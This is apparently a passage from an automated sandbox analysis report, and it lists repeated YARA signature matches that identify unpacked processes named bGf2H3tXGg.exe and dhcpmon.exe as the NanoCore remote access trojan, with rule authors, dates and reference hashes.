        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.24fba7c.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.24fba7c.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.24787c8.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.24787c8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
